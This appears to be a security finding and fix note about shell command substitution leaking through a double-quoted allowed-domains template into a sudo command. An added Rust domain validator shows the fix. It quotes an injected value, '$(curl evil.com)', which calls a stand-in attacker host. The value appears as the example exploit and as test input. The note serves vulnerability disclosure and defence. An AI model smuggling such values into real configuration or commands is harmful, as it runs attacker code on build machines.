Problem
The template fix for Finding 4 (#171) wraps {{ allowed_domains }} in double quotes in base.yml, but bash double-quoted strings still expand $(...) and ${...}. A user who adds $(curl evil.com) to network.allow will pass compilation and generate:
sudo -E ".../awf" \
--allow-domains "github.com,$(curl evil.com),other.com"
That command substitution executes on the runner with sudo -E.
Fix Applied
generate_allowed_domains now validates domains against strict DNS characters ([A-Za-z0-9.*-]) and returns a hard error for invalid characters. Changed from warn-and-skip to bail!.
Fixed in #175.
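An added example (not the project's own code) of the validation step described above: a stand-alone version of generate_allowed_domains that rejects any network.allow entry containing characters outside [A-Za-z0-9.*-], so shell metacharacters such as $, (, ), {, } and quotes can never reach the generated --allow-domains argument. The project's real function fails with anyhow's bail!; this version returns Result<String, String> so it compiles without external crates. The helper names validate_domain and is_allowed_domain_char, and the sample inputs, are assumptions made for the example.

```rust
// Added example, not the project's code. The real generate_allowed_domains
// uses anyhow::bail!; here a String error stands in for it so the example
// builds with the standard library alone.

/// Characters permitted in an allowed-domain entry: strict DNS characters
/// plus '.' as separator and '*' for wildcard entries. Matches [A-Za-z0-9.*-].
fn is_allowed_domain_char(c: char) -> bool {
    c.is_ascii_alphanumeric() || matches!(c, '.' | '*' | '-')
}

/// Validate one entry from `network.allow`. Any character outside the
/// allow-list is a hard error, which closes the double-quote expansion
/// problem: `$(...)`, `${...}`, backticks, quotes and whitespace are all
/// rejected before they can be interpolated into base.yml.
fn validate_domain(domain: &str) -> Result<(), String> {
    if domain.is_empty() {
        return Err("empty entry in network.allow".to_string());
    }
    if let Some(bad) = domain.chars().find(|c| !is_allowed_domain_char(*c)) {
        return Err(format!(
            "invalid character {:?} in network.allow entry {:?}: only [A-Za-z0-9.*-] is permitted",
            bad, domain
        ));
    }
    Ok(())
}

/// Build the comma-separated value for `--allow-domains`. Unlike the
/// earlier warn-and-skip behaviour, one invalid entry fails the whole
/// compilation (the equivalent of `bail!`), so no partial list is emitted.
fn generate_allowed_domains(entries: &[&str]) -> Result<String, String> {
    let mut out = Vec::with_capacity(entries.len());
    for entry in entries {
        validate_domain(entry)?;
        out.push(entry.to_string());
    }
    Ok(out.join(","))
}

fn main() {
    // Constructed sample inputs: a benign list, and the same list with the
    // command-substitution entry from the finding inserted.
    let good = ["github.com", "*.githubusercontent.com", "other.com"];
    let bad = ["github.com", "$(curl evil.com)", "other.com"];
    println!("{:?}", generate_allowed_domains(&good));
    println!("{:?}", generate_allowed_domains(&bad));
}
```

Validating at compile time, rather than escaping at template time, is the safer design here: escaping has to be correct for every quoting context the value is ever rendered into, whereas a character allow-list makes the value inert in all of them.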
Related